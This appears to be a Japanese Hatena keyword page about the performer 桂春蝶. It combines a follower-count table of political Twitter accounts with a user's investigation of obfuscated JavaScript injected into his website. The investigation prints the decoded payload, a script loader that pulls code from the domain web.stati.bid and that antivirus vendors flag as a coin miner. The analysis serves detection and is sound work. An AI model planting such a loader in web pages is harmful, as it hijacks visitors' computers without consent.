はてなキーワード: 桂春蝶とは
フォロワー数 | |
---|---|
石平太郎@liyonyon | 372,619 |
高須克弥@katsuyatakasu | 348,741 |
百田尚樹@hyakutanaoki | 317,214 |
田母神俊雄@toshio_tamogami | 272,502 |
竹田恒泰@takenoma | 255,281 |
佐藤正久@SatoMasahisa | 223,932 |
西村幸祐@kohyu1952 | 188,329 |
みずき@mizukikenkan | 185,996 |
有本香@arimoto_kaori | 160,099 |
ケント・ギルバート@KentGilbert01 | 147,777 |
上念司@smith796000 | 139,723 |
KAZUYA@kazuyahkd | 136,308 |
和田政宗@wadamasamune | 133,341 |
足立康史@adachiyasushi | 113,580 |
渡邉哲也@daitojimari | 102,559 |
杉田水脈@miosugita | 107,943 |
櫻井よしこ@YoshikoSakurai | 99,812 |
アノニマス ポスト@anonymous201504 | 92,491 |
DAPPI@take_off_dress | 91,011 |
我那覇真子@ganaha_masako | 86,568 |
三橋貴明@TK_Mitsuhashi | 77,282 |
一色正春@nipponichi8 | 54,287 |
山田宏@yamazogaikuzo | 53,681 |
坂東忠信@japangard | 38,096 |
佐藤dennpaouo@casshufooo | 37,256 |
CatNA@CatNewsAgency | 36,799 |
桂春蝶@shunchoukatsura | 36,536 |
小川榮太郎@ogawaeitaro | 36,156 |
【保守を貫く『日本第一党』】どぼん@dbn50 | 34,167 |
小坪慎也@kotsubo48 | 32,115 |
六衛府@yukin_done | 30,293 |
菊池雅志@MasashiKikuchi | 29,012 |
ゴグマゴグ@Wyrm50 | 27,356 |
正義の見方@honmo_takeshi | 25,458 |
ことりん@Braveymithra | 23,957 |
Time to'mutual@time613 | 22,761 |
沈丁花@gakku2007 | 19,222 |
勧善懲悪55@kanzen55 | 18,618 |
むらかみ@ootam25 | 16,382 |
拡散&RT@RtRetweet2017 | 15,641 |
鈴木信行@ishinsya | 15,315 |
国民主権/反共産主義/自主憲法制定@hoyaya_sylph | 14,748 |
奥山真司@masatheman | 14,069 |
月刊『Hanada』編集部@HANADA_asuka | 12,880 |
日本ラブ@安倍総理支持!@utukushinihon | 12,864 |
岩田温@iwata910 | 11,778 |
JavaScriptには詳しくないため、コードをまるごと検索につっこんで類似例を見つけたいところだが、記号が多用されたコードはそのままではぐぐれないので
"javascript obfuscator dollar underscore" といったキーワードで検索
すると下記の解説サイトがヒットし、JJEncodeというツールで難読化されたものであることがわかる
https://blog.korelogic.com/blog/2015/01/12
デコードツールも紹介されているのでさっそく試してみると、以下の結果が得られる
var el = document.createElement('script'); el.src = 'https://web.stati.bid/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.20'; document.head.appendChild(el);
次に "web.stati.bid" でぐぐると下記のブログがヒットする
それによると去年12月ぐらいから複数のサイトが改変被害に遭っていて、同じスクリプトを挿入されているらしい
飛び先のURLはいくつかあるが、中でもこのstati.bidドメインは今月登録されたばかりの非常に新しいもののようだ
https://blog.sucuri.net/2018/02/wikipedia-page-review-revealed-minr-malware.html
ちょうど英語Wikipediaでも同ドメインへ繋がるリンクが貼られて一悶着あったようだが、そのURLは桂春蝶サイトに埋め込まれていたURLと(パラメータ込みで)完全一致する
警告は JS:Includer-BJQ [Trj] で、JavaScriptによるトロイのリンク埋め込みの判定だ。
ウイルスバスターなど、トレンドマイクロ社の製品でも遮断されるという報告がある。
警告はJS/CoinMiner.AEで、トロイのうち、仮想通貨マイニングスクリプトの判定だ。
しかし、念のためにオンラインURLスキャナーに掛けてみると、
https://virusdesk.kaspersky.com
共にSafe/clearの判定なのである。
rescan.proではHTTPエラー403以外SAFEとの事だが、そもそも403食らって何故スキャン出来るのか?
炎上しているので嫌がらせ登録された可能性もあるが、ユーザーのpostだけでブラックリスト入れるほどユルイセキュリティベンダもない筈だ。